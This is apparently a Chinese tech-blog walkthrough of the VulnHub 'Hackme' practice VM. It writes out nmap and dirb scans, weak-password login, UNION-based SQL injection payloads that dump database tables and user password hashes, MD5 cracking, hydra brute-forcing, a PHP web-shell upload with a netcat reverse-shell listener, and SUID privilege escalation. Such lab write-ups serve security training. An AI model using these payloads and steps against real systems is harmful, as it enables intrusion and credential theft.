技术博客
首页 所有文章 标签 分类 关于
技术博客

目录

vulnhub-Hackme-隧道建立SQL注入详细解题思路清晰

 收录于 靶场之路报错大师Ruturn404的网络警犬练习记录
   约 1091 字   预计阅读 3 分钟 
https://bing.ee123.net/img/rand?artid=146261474

vulnhub-Hackme-隧道建立、SQL注入、详细解题、思路清晰。

vulnhub-Hackme-隧道建立、SQL注入、详细解题、思路清晰。

一、信息收集 2025.3.14 PM 12:18

1、主机发现

arp-scan -l https://i-blog.csdnimg.cn/img_convert/cb1976864fc94e567c84a11491a335a8.png nmap -sn 192.168.66.0/24 https://i-blog.csdnimg.cn/img_convert/9b3d73790d75da4aaeed581e89b7ae21.png

2、端口扫描

1、nmap –min-rate 10000 -p- 192.168.66.182 -oA port 查看所有开放端口 https://i-blog.csdnimg.cn/img_convert/585cbba6aa264420c0d034591bd33483.png 2、map -sS -sV 192.168.66.182 附带服务版本信息,详细扫描 https://i-blog.csdnimg.cn/img_convert/1514118ffc488e82a61feaf6dfd5b545.png

3、vuln扫描

nmap –script=vuln -p 22,80 192.168.66.182 这里也是慢慢捡起来其他工具,这个可以扫描以往受到的攻击,扫描看一下

4、后台扫目录

dirb http://192.168.66.182 dirsearch -u http://192.168.66.182/ -e * -i 200 nikto -h 192.168.66.182 -p 80 扫描一下目录

5、访问80端口

1、sql注入 https://i-blog.csdnimg.cn/img_convert/5217b1abc0aa041da0644150d970064d.png https://i-blog.csdnimg.cn/img_convert/57def1a23dc5e622faa203bb9288c94f.png 这里一个弱口令admin、123456登录成功,我们看一下有什么功能吧 https://i-blog.csdnimg.cn/img_convert/628b7c3b2c0a0e2c642df76191ac1d9b.png 我们翻译一下是一个图书管理后台,我们还是一个管理员身份,这里万能语法可以生效,尝试一下有没有过滤吧 Ⅰ、判断是否存在sql注入 OSINT’ and 1=1# OSINT’ and 1=2# 这两段代码来判断是否存在sql注入,我们输入第二段代码返回异常或者无回显说明我们注入成功 或者我们使用’发现可以回显所有书名 https://i-blog.csdnimg.cn/img_convert/1fec9f155f3976d8feaccabe67203773.png Ⅱ、判断字段数 OSINT’ order by 4 这里也是判断了字段数 https://i-blog.csdnimg.cn/img_convert/a02903d7d669d379e88d8a078b57c744.png OSINT’ union select 1,2,3 – + 确定显示位 使用 UNION 命令来查找其中存在的列数,这里到4就没有回显了,我们判断又3列 Ⅲ、查询数据库版本和存在的数据库,这里因为是又三个回显点 OSINT’ union select version(),database(),3# https://i-blog.csdnimg.cn/img_convert/caded3170c1e502f16f0a43eff95e6fa.png 这些基本信息都能爆出来,我们接着爆库 Ⅳ、爆列 ok,这里也是调试好了,这两条语法都可以查询到,这里应该也算是万能语法,只是把列数确定好,把表名爆出来就大差不差了。这两个语法貌似没什么区别 OSINT’ union select group_concat(table_name),2,3 from information_schema.tables where table_schema=“webapphacking”# OSINT’ union select (select group_concat(table_name)),2,3 from information_schema.tables where table_schema=“webapphacking” – + https://i-blog.csdnimg.cn/img_convert/d2b6fbd6145875b915bfe9be19c5f2e1.png 这里一个books一个users,我们加下来吧这两个爆出来 Ⅴ、爆users表 OSINT’ union select group_concat(column_name),2,3 from information_schema.columns where table_name=“users” – + OSINT’ union select group_concat(column_name),2,3 from information_schema.columns where table_name=“users”# https://i-blog.csdnimg.cn/img_convert/ef731705d58dbef67f413b2c12b40d51.png 这里我们只需要爆出user和pasword即可,或者其他表格也能爆出来 OSINT’ union select group_concat(user),group_concat(pasword),3 from users# https://i-blog.csdnimg.cn/img_convert/0ef7a5fd4b60620cf82cc4a72e010ff5.png 这里我们就需要鉴定一下加密类型了 https://i-blog.csdnimg.cn/img_convert/171903f709df936cd54bbdde31bfb884.png 这里是md5加密,然后我们拿去解密尝试进行ssh登录 https://i-blog.csdnimg.cn/img_convert/7bfc5b42a1dde04368570050cda6160d.png 得到了一丢密码,拿去hydra爆破一下,失败了,我们拿这些账户登录一下这个端口,看看有没有其他信息

6、寻找突破口

https://i-blog.csdnimg.cn/img_convert/fc72f4d4b9e51d9395ec2f0f0c8fc268.png 这里原来是有用户名,而不是我们得到的user1,这次我们可以尝试hydra了 https://i-blog.csdnimg.cn/img_convert/6ab3b7840fd4917818e736c1cde0b4e6.png 这里有个惊喜啊,文件上传太熟了,赶紧丢个后门测试测试 https://i-blog.csdnimg.cn/img_convert/1638f0c9bd83c4dbeeb93873aa3f4726.png 笑了,上传到upload了是吧,和我们之前的uploads文件夹呼应了,我们去uploads看一下什么情况 https://i-blog.csdnimg.cn/img_convert/6f97fa77feab0132e4826cec7d8dbfa3.png 给爷整笑了,这里出现了一个png,我们上传一句话然后nc反连一下 2、后台目录 https://i-blog.csdnimg.cn/img_convert/6b39f978490b24dcfc8dcb5e3da62b39.png

7、隧道建立

nc -lvp 6666 https://i-blog.csdnimg.cn/img_convert/24395b437b5d2f5d7faf5756cd53bdc9.png 这次上传了php.png连接不到不知道是什么原因,但是php文件是可以连到的 https://i-blog.csdnimg.cn/img_convert/9c10acbcae2d2b132ca6c6ac8d3dbdad.png 我们修复一下shell 这里提权真的很垃圾啊,也可能是这个太简单了,主要是想不到这一点,这个touchmenot执行就提权了。 https://i-blog.csdnimg.cn/img_convert/4ad76046f56e307b585d8a6c26c7822d.png 后续我也会出更多打靶文章,希望大家关注!谢谢

更新于 2025-03-14
 数据库SqlOracle
返回 | 主页